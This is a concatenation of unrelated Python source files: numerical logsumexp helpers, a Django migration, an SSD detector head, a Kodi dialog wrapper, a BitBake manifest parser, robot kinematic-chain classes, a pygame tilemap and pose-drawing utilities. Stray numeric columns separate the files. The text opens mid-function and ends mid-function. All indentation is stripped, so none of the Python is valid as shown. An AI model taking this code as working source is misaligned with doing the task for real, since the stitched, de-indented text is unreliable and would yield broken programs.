# assert 1 == 0
out_logsumexp = np.squeeze(out_logsumexp)
return out_logsumexp, out_conditionalprobs
def _logsumexp_condprobs_red(array):
"""normalization and conditional probabilities for reduced levels,
a ... two-dimensional array"""
a_max = np.amax(array, axis=1, keepdims=True)
a_max = np.maximum(a_max, 0)
# last line: account for missing column with probs exp(0) for 0th level
if a_max.ndim > 0:
a_max[~np.isfinite(a_max)] = 0
elif not np.isfinite(a_max):
a_max = 0
exp_shifted = np.exp(array - a_max) # a_max is repeated columnwise (axis=1)
# calc column vector s of (shifted) normalization sums
# note that entries always > 1, since one summand in each col is exp(0)
summed = np.sum(exp_shifted, axis=1, keepdims=True)
summed += np.exp(-a_max) # add values from missing 0th column
# suppress warnings about log of zero
with np.errstate(divide='ignore'):
out_logsumexp = np.log(summed)
out_logsumexp += a_max
out_logsumexp = np.squeeze(out_logsumexp)
# node conditional probabilities, required for gradient
size = array.shape[1]
out_conditionalprobs = np.divide(exp_shifted,
np.dot(summed, np.ones((1, size))))
# note: log of this is not stable if probabilities close to zero
# - use logsumexp instead for calculating plh value
return out_logsumexp, out_conditionalprobs
###############################################################################
# some conversion functions for representations of discrete data
###############################################################################
def dummy_to_index_single(dummy_x, sizes):
"""convert dummy to index representation"""
offset = 0
ind = np.empty(len(sizes), dtype=np.int)
for i, size_r in enumerate(sizes):
for j in range(size_r):
if dummy_x[offset + j] == 1:
ind[i] = j
break
offset += size_r
return ind
def dummy_to_index(dummy_data, sizes):
"""convert dummy to index representation"""
n_data, ltot = dummy_data.shape
assert ltot == sum(sizes)
n_cat = len(sizes)
index_data = np.empty((n_data, n_cat), dtype=np.int)
for k in range(n_data):
offset = 0
for i, size_r in enumerate(sizes):
for j in range(size_r):
if dummy_data[offset + j] == 1:
index_data[k, i] = j
break
offset += size_r
return index_data
#def dummypadded_to_unpadded(dummy_data, n_cat):
# """remove convert dummy to index representation"""
# unpadded = np.empty(n_cat)
# for i,x in enumerate(dummy_data):
# if i % 2 == 1:
# unpadded[i // 2] = x
# return unpadded
def index_to_dummy(idx, glims, ltot):
"""convert index to dummy representation"""
dummy_data = np.zeros(ltot)
for i, ind in enumerate(idx):
dummy_data[glims[i] + ind] = 1
return dummy_data
def dummy2dummyred(dummy_data, glims):
"""convert dummy to reduced dummy representation"""
return np.delete(dummy_data, glims[:-1], 1)
###############################################################################
# testing utilities
###############################################################################
def strlistfrom(array, rnd=2):
"""a convenient representation for printing out numpy array
s.t. it can be reused as a list"""
string = np.array2string(array, precision=rnd, separator=',')
string = 'np.array(' + string.translate({ord(c): None for c in '\n '}) + ')'
return string
def tomatlabmatrix(mat):
"""print numpy matrix in a way that can be pasted into MATLAB code."""
nrows, ncols = mat.shape
string = "["
for i in range(nrows):
string += "["
for j in range(ncols):
string += str(mat[i, j]) + " "
string += "];"
string = string[:-1] + "]"
print(string)
def frange(start, stop, step):
"""a float range function"""
i = start
while i < stop:
yield i
i += step
if __name__ == '__main__':
SIZES = [2, 2, 2]
GLIMS = [0, 2, 4, 6]
LTOT = 6
IND = [0, 0, 1]
DUMMY = index_to_dummy(IND, GLIMS, LTOT)
IND2 = dummy_to_index_single(DUMMY, SIZES)
MAT = np.arange(6).reshape((3, 2))
RES = _logsumexp_condprobs_red(MAT)
print(RES)
# res should be
# (array([ 1.55144471, 3.34901222, 5.31817543]), array([[ 0.21194156, 0.57611688],
# [ 0.25949646, 0.70538451],
# [ 0.26762315, 0.72747516]]))
| 13,231 | 4,663 |
# Generated by Django 2.2.4 on 2020-02-07 18:11
from django.db import migrations, models
import django.db.models.deletion
import jsonfield.fields
class Migration(migrations.Migration):
dependencies = [
('authorization', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Course',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, max_length=100)),
('price', jsonfield.fields.JSONField(blank=True, null=True)),
],
),
migrations.AlterField(
model_name='daily',
name='course',
field=models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='authorization.Course'),
),
migrations.AddField(
model_name='group',
name='course',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='authorization.Course'),
),
]
| 1,091 | 334 |
import torch.nn as nn
import torch.nn.functional as F
from ssd.modeling.anchor import make_anchor_generator
from ssd.utils import bbox
from .inference import make_post_processor
from .loss import make_loss_evaluator
from .predictor import make_ssd_predictor
class SSDHead(nn.Module):
def __init__(self, cfg, in_channels):
super(SSDHead, self).__init__()
num_classes = cfg.MODEL.NUM_CLASSES
anchors_per_location = [
len(aspect_ratio) * 2 + 2
for aspect_ratio in cfg.MODEL.ANCHOR.ASPECT_RATIOS
]
self.predictor = make_ssd_predictor(cfg, in_channels, anchors_per_location, num_classes)
self.loss_evaluator = make_loss_evaluator(cfg)
self.post_processor = make_post_processor(cfg)
self.anchor_generator = make_anchor_generator(cfg)
self.center_variance = cfg.MODEL.CENTER_VARIANCE
self.size_variance = cfg.MODEL.SIZE_VARIANCE
self.size = cfg.INPUT.SIZE
def forward(self, features, targets=None):
cls_logits, bbox_pred = self.predictor(features)
if self.training:
return self._forward_train(cls_logits, bbox_pred, targets)
else:
return self._forward_test(cls_logits, bbox_pred)
def _forward_train(self, cls_logits, bbox_pred, targets):
gt_boxes, gt_labels = targets[0], targets[1]
cls_loss, reg_loss = self.loss_evaluator(cls_logits, bbox_pred, gt_labels, gt_boxes)
loss_dict = dict(
cls_loss=cls_loss,
reg_loss=reg_loss,
)
return {}, loss_dict
def _forward_test(self, cls_logits, bbox_pred):
anchors = self.anchor_generator.generate_anchors()
anchors = anchors.to(cls_logits.device)
scores = F.softmax(cls_logits, dim=2)
boxes = bbox.convert_locations_to_boxes(
bbox_pred,
anchors,
self.center_variance,
self.size_variance
)
boxes = bbox.xywh2xyxy(boxes)
detections = self.post_processor(boxes, scores)
return detections, {}
| 2,081 | 706 |
"""Find max element"""
#!/usr/bin/env python3
"""Find max element"""
import random
from collections import Counter
List = [random.randrange(1, 15) for num in range(10)]
def most_frequent(List):
occurence_count = Counter(List)
return occurence_count.most_common()
frequent_number, frequency = most_frequent(List)[0]
print(f"List {List}: \nMost frequent number {frequent_number} \nFrequency: {frequency}")
| 415 | 141 |
# -*- coding: utf-8 -*-
import xbmcgui
class DialogProgress:
def __init__(self):
self.dlg = xbmcgui.DialogProgress()
self.__reset__()
def __reset__(self):
self.head = ''
self.firstline = ''
self.secondline = None
self.thirdline = None
self.percent = 0
def isCanceled(self):
return self.dlg.iscanceled()
def update(self, percent=None, firstline=None, secondline=None, thirdline=None):
if firstline:
self.firstline = firstline
if secondline:
self.secondline = secondline
if thirdline:
self.thirdline = thirdline
if percent:
self.percent = percent
if self.secondline and self.thirdline:
self.dlg.update(self.percent, self.firstline, self.secondline, self.thirdline)
elif self.secondline:
self.dlg.update(self.percent, self.firstline, self.secondline)
else:
self.dlg.update(self.percent, self.firstline)
def create(self, head, firstline = None, secondline=None, thirdline=None):
if firstline:
self.firstline = firstline
if secondline:
self.secondline = secondline
if thirdline:
self.thirdline = thirdline
if self.secondline and self.thirdline:
self.dlg.create(head, self.firstline, self.secondline, self.thirdline)
elif self.secondline:
self.dlg.create(head, self.firstline, self.secondline)
else:
self.dlg.create(head, self.firstline)
def close(self):
self.dlg.close()
self.__reset__() | 1,659 | 493 |
# ex:ts=4:sw=4:sts=4:et
# -*- tab-width: 4; c-basic-offset: 4; indent-tabs-mode: nil -*-
#
# Copyright (C) 2003, 2004 Chris Larson
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
import os, sys
import bb, bb.data
def getfields(line):
fields = {}
fieldmap = ( "pkg", "src", "dest", "type", "mode", "uid", "gid", "major", "minor", "start", "inc", "count" )
for f in xrange(len(fieldmap)):
fields[fieldmap[f]] = None
if not line:
return None
splitline = line.split()
if not len(splitline):
return None
try:
for f in xrange(len(fieldmap)):
if splitline[f] == '-':
continue
fields[fieldmap[f]] = splitline[f]
except IndexError:
pass
return fields
def parse (mfile, d):
manifest = []
while 1:
line = mfile.readline()
if not line:
break
if line.startswith("#"):
continue
fields = getfields(line)
if not fields:
continue
manifest.append(fields)
return manifest
def emit (func, manifest, d):
#str = "%s () {\n" % func
str = ""
for line in manifest:
emittedline = emit_line(func, line, d)
if not emittedline:
continue
str += emittedline + "\n"
# str += "}\n"
return str
def mangle (func, line, d):
import copy
newline = copy.copy(line)
src = bb.data.expand(newline["src"], d)
if src:
if not os.path.isabs(src):
src = "${WORKDIR}/" + src
dest = newline["dest"]
if not dest:
return
if dest.startswith("/"):
dest = dest[1:]
if func is "do_install":
dest = "${D}/" + dest
elif func is "do_populate":
dest = "${WORKDIR}/install/" + newline["pkg"] + "/" + dest
elif func is "do_stage":
varmap = {}
varmap["${bindir}"] = "${STAGING_DIR}/${HOST_SYS}/bin"
varmap["${libdir}"] = "${STAGING_DIR}/${HOST_SYS}/lib"
varmap["${includedir}"] = "${STAGING_DIR}/${HOST_SYS}/include"
varmap["${datadir}"] = "${STAGING_DATADIR}"
matched = 0
for key in varmap.keys():
if dest.startswith(key):
dest = varmap[key] + "/" + dest[len(key):]
matched = 1
if not matched:
newline = None
return
else:
newline = None
return
newline["src"] = src
newline["dest"] = dest
return newline
def emit_line (func, line, d):
import copy
newline = copy.deepcopy(line)
newline = mangle(func, newline, d)
if not newline:
return None
str = ""
type = newline["type"]
mode = newline["mode"]
src = newline["src"]
dest = newline["dest"]
if type is "d":
str = "install -d "
if mode:
str += "-m %s " % mode
str += dest
elif type is "f":
if not src:
return None
if dest.endswith("/"):
str = "install -d "
str += dest + "\n"
str += "install "
else:
str = "install -D "
if mode:
str += "-m %s " % mode
str += src + " " + dest
del newline
return str
| 3,828 | 1,234 |
'''
Classes implementing various kinematic chains. This module is perhaps mis-located
as it does not have a direct BMI role but rather contains code which is useful in
supporting BMI control of kinematic chains.
This code depends on the 'robot' module (https://github.com/sgowda/robotics_toolbox)
'''
import numpy as np
try:
import robot
except ImportError:
import warnings
warnings.warn("The 'robot' module cannot be found! See https://github.com/sgowda/robotics_toolbox")
import matplotlib.pyplot as plt
from collections import OrderedDict
import time
pi = np.pi
class KinematicChain(object):
'''
Arbitrary kinematic chain (i.e. spherical joint at the beginning of
each joint)
'''
def __init__(self, link_lengths=[10., 10.], name='', base_loc=np.array([0., 0., 0.]), rotation_convention=1):
'''
Docstring
Parameters
----------
link_lengths: iterable
Lengths of all the distances between joints
base_loc: np.array of shape (3,), default=np.array([0, 0, 0])
Location of the base of the kinematic chain in an "absolute" reference frame
'''
self.n_links = len(link_lengths)
self.link_lengths = link_lengths
self.base_loc = base_loc
assert rotation_convention in [-1, 1]
self.rotation_convention = rotation_convention
# Create the robot object. Override for child classes with different types of joints
self._init_serial_link()
self.robot.name = name
def _init_serial_link(self):
links = []
for link_length in self.link_lengths:
link1 = robot.Link(alpha=-pi/2)
link2 = robot.Link(alpha=pi/2)
link3 = robot.Link(d=-link_length)
links += [link1, link2, link3]
# By convention, we start the arm in the XY-plane
links[1].offset = -pi/2
self.robot = robot.SerialLink(links)
def calc_full_joint_angles(self, joint_angles):
'''
Override in child classes to perform static transforms on joint angle inputs. If some
joints are always static (e.g., if the chain only operates in a plane)
this can avoid unclutter joint angle specifications.
'''
return self.rotation_convention * joint_angles
def full_angles_to_subset(self, joint_angles):
'''
Docstring
Parameters
----------
Returns
-------
'''
return joint_angles
def plot(self, joint_angles):
'''
Docstring
Parameters
----------
Returns
-------
'''
joint_angles = self.calc_full_joint_angles(joint_angles)
self.robot.plot(joint_angles)
def forward_kinematics(self, joint_angles, **kwargs):
'''
Calculate forward kinematics using D-H parameter convention
Parameters
----------
Returns
-------
'''
joint_angles = self.calc_full_joint_angles(joint_angles)
t, allt = self.robot.fkine(joint_angles, **kwargs)
self.joint_angles = joint_angles
self.t = t
self.allt = allt
return t, allt
def apply_joint_limits(self, joint_angles):
'''
Docstring
Parameters
----------
Returns
-------
'''
return joint_angles
def inverse_kinematics(self, target_pos, q_start=None, method='pso', **kwargs):
'''
Docstring
Parameters
----------
Returns
-------
'''
if q_start == None:
q_start = self.random_sample()
return self.inverse_kinematics_pso(target_pos, q_start, **kwargs)
# ik_method = getattr(self, 'inverse_kinematics_%s' % method)
# return ik_method(q_start, target_pos)
def inverse_kinematics_grad_descent(self, target_pos, starting_config, n_iter=1000, verbose=False, eps=0.01, return_path=False):
'''
Default inverse kinematics method is RRT since for redundant
kinematic chains, an infinite number of inverse kinematics solutions
exist
Docstring
Parameters
----------
Returns
-------
'''
q = starting_config
start_time = time.time()
endpoint_traj = np.zeros([n_iter, 3])
joint_limited = np.zeros(len(q))
for k in range(n_iter):
# print k
# calc endpoint position of the manipulator
endpoint_traj[k] = self.endpoint_pos(q)
current_cost = np.linalg.norm(endpoint_traj[k] - target_pos, 2)
if current_cost < eps:
print("Terminating early")
break
# calculate the jacobian
J = self.jacobian(q)
J_pos = J[0:3,:]
# for joints that are at their limit, zero out the jacobian?
# J_pos[:, np.nonzero(self.calc_full_joint_angles(joint_limited))] = 0
# take a step from the current position toward the target pos using the inverse Jacobian
J_inv = np.linalg.pinv(J_pos)
# J_inv = J_pos.T
xdot = (target_pos - endpoint_traj[k])#/np.linalg.norm(endpoint_traj[k] - target_pos)
# if current_cost < 3 or k > 10:
# stepsize = 0.001
# else:
# stepsize = 0.01
xdot = (target_pos - endpoint_traj[k])#/np.linalg.norm(endpoint_traj[k] - target_pos)
# xdot = (endpoint_traj[k] - target_pos)/np.linalg.norm(endpoint_traj[k] - target_pos)
qdot = 0.001*np.dot(J_inv, xdot)
qdot = self.full_angles_to_subset(np.array(qdot).ravel())
q += qdot
# apply joint limits
q, joint_limited = self.apply_joint_limits(q)
end_time = time.time()
runtime = end_time - start_time
if verbose:
print("Runtime: %g" % runtime)
print("# of iterations: %g" % k)
if return_path:
return q, endpoint_traj[:k]
else:
return q
def jacobian(self, joint_angles):
'''
Return the full jacobian
Docstring
Parameters
----------
Returns
-------
'''
joint_angles = self.calc_full_joint_angles(joint_angles)
J = self.robot.jacobn(joint_angles)
return J
def endpoint_pos(self, joint_angles):
'''
Docstring
Parameters
----------
Returns
-------
'''
t, allt = self.forward_kinematics(joint_angles)
pos_rel_to_base = np.array(t[0:3,-1]).ravel()
return pos_rel_to_base + self.base_loc
def ik_cost(self, q, q_start, target_pos, weight=100):
'''
Docstring
Parameters
----------
Returns
-------
'''
q_diff = q - q_start
return np.linalg.norm(q_diff[0:2]) + weight*np.linalg.norm(self.endpoint_pos(q) - target_pos)
def inverse_kinematics_pso(self, target_pos, q_start, time_limit=np.inf, verbose=False, eps=0.5, n_particles=10, n_iter=10):
'''
Docstring
Parameters
----------
Returns
-------
'''
# Initialize the particles;
n_joints = self.n_joints
particles_q = np.tile(q_start, [n_particles, 1])
# if 0:
# # initialize the velocities to be biased around the direction the jacobian tells you is correct
# current_pos = self.endpoint_pos(q_start)
# int_displ = target_pos - current_pos
# print int_displ, target_pos
# J = self.jacobian(q_start)
# endpoint_vel = np.random.randn(n_particles, 3)# + int_displ
# particles_v = np.dot(J[0:3,1::3].T, endpoint_vel.T).T
# else:
# # initialize particle velocities randomly
particles_v = np.random.randn(n_particles, n_joints) #/ np.array([1., 1., 1, 1]) #np.array(self.link_lengths)
cost_fn = lambda q: self.ik_cost(q, q_start, target_pos)
gbest = particles_q.copy()
gbestcost = np.array(list(map(cost_fn, gbest)))
pbest = gbest[np.argmin(gbestcost)]
pbestcost = cost_fn(pbest)
min_limits = np.array([x[0] for x in self.joint_limits])
max_limits = np.array([x[1] for x in self.joint_limits])
min_limits = np.tile(min_limits, [n_particles, 1])
max_limits = np.tile(max_limits, [n_particles, 1])
start_time = time.time()
for k in range(n_iter):
if time.time() - start_time > time_limit:
break
# update positions of particles
particles_q += particles_v
# apply joint limits
min_viol = particles_q < min_limits
max_viol = particles_q > max_limits
particles_q[min_viol] = min_limits[min_viol]
particles_q[max_viol] = max_limits[max_viol]
# update the costs
costs = np.array(list(map(cost_fn, particles_q)))
# update the 'bests'
gbest[gbestcost > costs] = particles_q[gbestcost > costs]
gbestcost[gbestcost > costs] = costs[gbestcost > costs]
idx = np.argmin(gbestcost)
pbest = gbest[idx]
pbestcost = gbestcost[idx]
# update the velocity
phi1 = 1#np.random.rand()
phi2 = 1#np.random.rand()
w=0.25
c1=0.5
c2=0.25
particles_v = w*particles_v + c1*phi1*(pbest - particles_q) + c2*phi2*(gbest - particles_q)
error = np.linalg.norm(self.endpoint_pos(pbest) - target_pos)
if error < eps:
break
end_time = time.time()
if verbose: print("Runtime = %g, error = %g, n_iter=%d" % (end_time-start_time, error, k))
return pbest
def spatial_positions_of_joints(self, joint_angles):
'''
Docstring
Parameters
----------
Returns
-------
'''
_, allt = self.forward_kinematics(joint_angles, return_allt=True)
pos = (allt[0:3, -1,:].T + self.base_loc).T
# pos = np.hstack([np.zeros([3,1]), pos])
return pos
class PlanarXZKinematicChain(KinematicChain):
'''
Kinematic chain restricted to movement in the XZ-plane
'''
def _init_serial_link(self):
base = robot.Link(alpha=pi/2, d=0, a=0)
links = [base]
for link_length in self.link_lengths:
link1 = robot.Link(alpha=0, d=0, a=link_length)
links.append(link1)
# link2 = robot.Link(alpha=pi/2)
# link3 = robot.Link(d=-link_length)
# links += [link1, link2, link3]
# By convention, we start the arm in the XY-plane
# links[1].offset = -pi/2
self.robot = robot.SerialLink(links)
def calc_full_joint_angles(self, joint_angles):
'''
only some joints rotate in the planar kinematic chain
Parameters
----------
joint_angles : np.ndarray of shape (self.n_links)
Joint angles without the angle for the base link, which is fixed at 0
Returns
-------
joint_angles_full : np.ndarray of shape (self.n_links+1)
Add on the 0 at the proximal end for the base link angle
'''
if not len(joint_angles) == self.n_links:
raise ValueError("Incorrect number of joint angles specified!")
# # There are really 3 angles per joint to allow 3D rotation at each joint
# joint_angles_full = np.zeros(self.n_links * 3)
# joint_angles_full[1::3] = joint_angles
joint_angles_full = np.hstack([0, joint_angles])
return self.rotation_convention * joint_angles_full
def random_sample(self):
'''
Sample the joint configuration space within the limits of each joint
Parameters
----------
None
Returns
-------
None
'''
if hasattr(self, 'joint_limits'):
joint_limits = self.joint_limits
else:
joint_limits = [(-np.pi, np.pi)] * self.n_links
q_start = []
for lim_min, lim_max in joint_limits:
q_start.append(np.random.uniform(lim_min, lim_max))
return np.array(q_start)
def full_angles_to_subset(self, joint_angles):
'''
Docstring
Parameters
----------
Returns
-------
'''
# return joint_angles[1::3]
return joint_angles[1:]
def apply_joint_limits(self, joint_angles):
'''
Docstring
Parameters
----------
Returns
-------
'''
if not hasattr(self, 'joint_limits'):
return joint_angles
else:
angles = []
limit_hit = []
for angle, (lim_min, lim_max) in zip(joint_angles, self.joint_limits):
limit_hit.append(angle < lim_min or angle > lim_max)
angle = max(lim_min, angle)
angle = min(angle, lim_max)
angles.append(angle)
return np.array(angles), np.array(limit_hit)
@property
def n_joints(self):
'''
In a planar arm, the number of joints equals the number of links
'''
return len(self.link_lengths)
def spatial_positions_of_joints(self, *args, **kwargs):
'''
Docstring
Parameters
----------
Returns
-------
'''
pos_all_joints = super(PlanarXZKinematicChain, self).spatial_positions_of_joints(*args, **kwargs)
return pos_all_joints #(pos_all_joints[:,::3].T + self.base_loc).T
def create_ik_subchains(self):
'''
Docstring
Parameters
----------
Returns
-------
'''
proximal_link_lengths = self.link_lengths[:2]
distal_link_lengths = self.link_lengths[2:]
self.proximal_chain = PlanarXZKinematicChain2Link(proximal_link_lengths)
if len(self.link_lengths) > 2:
self.distal_chain = PlanarXZKinematicChain(distal_link_lengths)
else:
self.distal_chain = None
def inverse_kinematics(self, target_pos, **kwargs):
'''
Docstring
Parameters
----------
Returns
-------
'''
target_pos = target_pos.copy()
target_pos -= self.base_loc
if not hasattr(self, 'proximal_chain') or not hasattr(self, 'distal_chain'):
self.create_ik_subchains()
if len(self.link_lengths) > 2:
distal_angles = kwargs.pop('distal_angles', None)
if distal_angles is None:
# Sample randomly from the joint limits (-pi, pi) if not specified
if not hasattr(self, 'joint_limits') or len(self.joint_limits) < len(self.link_lengths):
joint_limits = [(-pi, pi)] * len(self.distal_chain.link_lengths)
else:
joint_limits = self.joint_limits[2:]
distal_angles = np.array([np.random.uniform(*limits) for limits in joint_limits])
distal_displ = self.distal_chain.endpoint_pos(distal_angles)
proximal_endpoint_pos = target_pos - distal_displ
proximal_angles = self.proximal_chain.inverse_kinematics(proximal_endpoint_pos).ravel()
angles = distal_angles.copy()
joint_angles = proximal_angles.tolist()
angles[0] -= np.sum(proximal_angles)
ik_angles = np.hstack([proximal_angles, angles])
ik_angles = np.array([np.arctan2(np.sin(angle), np.cos(angle)) for angle in ik_angles])
return ik_angles
else:
return self.proximal_chain.inverse_kinematics(target_pos).ravel()
def jacobian(self, theta, old=False):
'''
Returns the first derivative of the forward kinematics function for x and z endpoint positions:
[[dx/dtheta_1, ..., dx/dtheta_N]
[dz/dtheta_1, ..., dz/dtheta_N]]
Parameters
----------
theta : np.ndarray of shape (N,)
Valid configuration for the arm (the jacobian calculations are specific to the configuration of the arm)
Returns
-------
J : np.ndarray of shape (2, N)
Manipulator jacobian in the format above
'''
if old:
# Calculate jacobian based on hand calculation specific to this type of chain
l = self.link_lengths
N = len(theta)
J = np.zeros([2, len(l)])
for m in range(N):
for i in range(m, N):
J[0, m] += -l[i]*np.sin(sum(self.rotation_convention*theta[:i+1]))
J[1, m] += l[i]*np.cos(sum(self.rotation_convention*theta[:i+1]))
return J
else:
# Use the robotics toolbox and the generic D-H convention jacobian
J = self.robot.jacob0(self.calc_full_joint_angles(theta))
return np.array(J[[0,2], 1:])
def endpoint_potent_null_split(self, q, vel, return_J=False):
'''
(Approximately) split joint velocities into an endpoint potent component,
which moves the endpoint, and an endpoint null component which only causes self-motion
'''
J = self.jacobian(q)
J_pinv = np.linalg.pinv(J)
J_task = np.dot(J_pinv, J)
J_null = np.eye(self.n_joints) - J_task
vel_task = np.dot(J_task, vel)
vel_null = np.dot(J_null, vel)
if return_J:
return vel_task, vel_null, J, J_pinv
else:
return vel_task, vel_null
def config_change_nullspace_workspace(self, config1, config2):
'''
For two configurations, determine how much joint displacement is in the "null" space and how much is in the "task" space
Docstring
Parameters
----------
Returns
-------
'''
config = config1
vel = config2 - config1
endpt1 = self.endpoint_pos(config1)
endpt2 = self.endpoint_pos(config2)
task_displ = np.linalg.norm(endpt1 - endpt2)
# compute total displ of individual joints
total_joint_displ = 0
n_joints = len(config1)
for k in range(n_joints):
jnt_k_vel = np.zeros(n_joints)
jnt_k_vel[k] = vel[k]
single_joint_displ_pos = self.endpoint_pos(config + jnt_k_vel)
total_joint_displ += np.linalg.norm(endpt1 - single_joint_displ_pos)
return task_displ, total_joint_displ
def detect_collision(self, theta, obstacle_pos):
'''
Detect a collision between the chain and a circular object
'''
spatial_joint_pos = self.spatial_positions_of_joints(theta).T + self.base_loc
plant_segments = [(x, y) for x, y in zip(spatial_joint_pos[:-1], spatial_joint_pos[1:])]
dist_to_object = np.zeros(len(plant_segments))
for k, segment in enumerate(plant_segments):
dist_to_object[k] = point_to_line_segment_distance(obstacle_pos, segment)
return dist_to_object
def plot_joint_pos(self, joint_pos, ax=None, flip=False, **kwargs):
if ax == None:
plt.figure()
ax = plt.subplot(111)
if isinstance(joint_pos, dict):
joint_pos = np.vstack(list(joint_pos.values()))
elif isinstance(joint_pos, np.ndarray) and np.ndim(joint_pos) == 1:
joint_pos = joint_pos.reshape(1, -1)
elif isinstance(joint_pos, tuple):
joint_pos = np.array(joint_pos).reshape(1, -1)
for pos in joint_pos:
spatial_pos = self.spatial_positions_of_joints(pos).T
shoulder_anchor = np.array([2., 0., -15.])
spatial_pos = spatial_pos# + shoulder_anchor
if flip:
ax.plot(-spatial_pos[:,0], spatial_pos[:,2], **kwargs)
else:
ax.plot(spatial_pos[:,0], spatial_pos[:,2], **kwargs)
return ax
def point_to_line_segment_distance(point, segment):
'''
Determine the distance between a point and a line segment. Used to determine collisions between robot arm links and virtual obstacles.
Adapted from http://stackoverflow.com/questions/849211/shortest-distance-between-a-point-and-a-line-segment
'''
v, w = segment
l2 = np.sum(np.abs(v - w)**2)
if l2 == 0:
return np.linalg.norm(v - point)
t = np.dot(point - v, w - v)/l2
if t < 0:
return np.linalg.norm(point - v)
elif t > 1:
return np.linalg.norm(point - w)
else:
projection = v + t*(w-v)
return np.linalg.norm(projection - point)
class PlanarXZKinematicChain2Link(PlanarXZKinematicChain):
''' Docstring '''
def __init__(self, link_lengths, *args, **kwargs):
'''
Docstring
Parameters
----------
Returns
-------
'''
if not len(link_lengths) == 2:
raise ValueError("Can't instantiate a 2-link arm with > 2 links!")
super(PlanarXZKinematicChain2Link, self).__init__(link_lengths, *args, **kwargs)
def inverse_kinematics(self, pos, **kwargs):
'''
Inverse kinematics for a two-link kinematic chain. These equations can be solved
deterministically.
Docstring
Parameters
----------
pos : np.ndarray of shape (3,)
Desired endpoint position where the coordinate system origin is the base of the arm. y coordinate must be 0
Returns
-------
np.ndarray of shape (2,)
Joint angles which yield the endpoint position with the forward kinematics of this manipulator
'''
pos -= self.base_loc
l_upperarm, l_forearm = self.link_lengths
if np.ndim(pos) == 1:
pos = pos.reshape(1,-1)
# require the y-coordinate to be 0, i.e. flat on the screen
x, y, z = pos[:,0], pos[:,1], pos[:,2]
assert np.all(np.abs(np.array(y)) < 1e-10)
L = np.sqrt(x**2 + z**2)
cos_el_pflex = (L**2 - l_forearm**2 - l_upperarm**2) / (2*l_forearm*l_upperarm)
cos_el_pflex[ (cos_el_pflex > 1) & (cos_el_pflex < 1 + 1e-9)] = 1
el_pflex = np.arccos(cos_el_pflex)
sh_pabd = np.arctan2(z, x) - np.arcsin(l_forearm * np.sin(np.pi - el_pflex) / L)
return np.array([sh_pabd, el_pflex]) | 23,209 | 7,297 |
import pygame
from pygame.math import Vector2
import json, math
class Tilemap:
def __init__(self, tileSize, imgs, chunkSize=8):
self.tileSize = tileSize
self.imgs = imgs
self.drawTiles = []
self.chunks = {}
self.chunkSize = chunkSize
def toChunkScale(self, p):
return math.floor(p/self.tileSize/self.chunkSize)
def toChunkPos(self, p):
return (self.toChunkScale(p[0]), self.toChunkScale(p[1]))
def collidePoint(self, p:Vector2):
cp = self.toChunkPos(p)
if cp in self.chunks:
for rect in self.chunks[cp]:
if rect.collidepoint(p): return True
return False
def _getColRects(self, testPointsX, testPointsY, colRects):
minX = self.toChunkScale(min(testPointsX))
maxX = self.toChunkScale(max(testPointsX))
minY = self.toChunkScale(min(testPointsY))
maxY = self.toChunkScale(max(testPointsY))
testChunkPositions = {
(minX, minY), (minX, maxY),
(maxX, minY), (maxX, maxY)
}
if colRects is None: colRects = []
for pos in testChunkPositions:
if pos in self.chunks:
colRects += self.chunks[pos]
return colRects
def getEntityColRects(self, pos, width, height, vel, colRects=None):
return self._getColRects( \
( pos.x, pos.x + width, pos.x + vel.x, pos.x + width + vel.x ),
( pos.y, pos.y + height, pos.y + vel.y, pos.y + height + vel.y ), \
colRects)
def getRectColRects(self, rect, colRects=None):
return self._getColRects((rect.x, rect.right), (rect.y, rect.bottom), colRects)
def draw(self, win, scroll=None):
if scroll is None: scroll = Vector2(0, 0)
winDim = win.get_size()
for layer in self.drawTiles:
for tile in layer:
if tile[0] < winDim[0]+scroll.x and tile[0] > scroll.x-self.tileSize and \
tile[1] < winDim[1]+scroll.y and tile[1] > scroll.y-self.tileSize:
win.blit(self.imgs[tile[2]], (tile[0] - scroll.x, tile[1] - scroll.y))
def drawCollision(self, win, scroll=None):
if scroll is None: scroll = Vector2(0, 0)
cols = ((255,0,0), (0,255,0), (0,0,255))
for pos, rects in self.chunks.items():
pygame.draw.rect(win, (255,255,255), \
(pos[0] * self.tileSize * self.chunkSize - scroll.x,\
pos[1] * self.tileSize * self.chunkSize - scroll.y,\
self.tileSize * self.chunkSize, self.tileSize * self.chunkSize), 1)
for i, rect in enumerate(rects):
pygame.draw.rect(win, cols[i%len(cols)], \
(rect.x - scroll.x, rect.y - scroll.y, \
rect.w, rect.h), width=1)
def loadLevel(self, filepath):
with open(filepath, 'r') as f:
data = json.loads(f.read())
for layer in data["drawTiles"]:
tempLayer = []
for key, item in layer.items():
pStr = key.split(';')
x, y = int(pStr[0]), int(pStr[1])
tempLayer.append((x*self.tileSize, y*self.tileSize, item))
self.drawTiles.append(tempLayer)
for pos, rects in data["chunks"].items():
tempRects = []
for rect in rects:
tempRects.append(pygame.Rect(rect))
pStr = pos.split(';')
self.chunks[(int(pStr[0]), int(pStr[1]))] = tempRects
if "extraData" in data:
return data["extraData"] | 3,622 | 1,231 |
"""
Miscellaneous utility functions.
"""
import random
import time
from contextlib import contextmanager
import math
import numpy as np
import torch
from PIL.ImageDraw import Draw
# Joints to connect for visualisation, giving the effect of drawing a
# basic "skeleton" of the pose.
BONES = {
'right_lower_leg': (0, 1),
'right_upper_leg': (1, 2),
'right_pelvis': (2, 6),
'left_lower_leg': (4, 5),
'left_upper_leg': (3, 4),
'left_pelvis': (3, 6),
'center_lower_torso': (6, 7),
'center_upper_torso': (7, 8),
'center_head': (8, 9),
'right_lower_arm': (10, 11),
'right_upper_arm': (11, 12),
'right_shoulder': (12, 8),
'left_lower_arm': (14, 15),
'left_upper_arm': (13, 14),
'left_shoulder': (13, 8),
}
def draw_skeleton(img, coords, joint_mask=None):
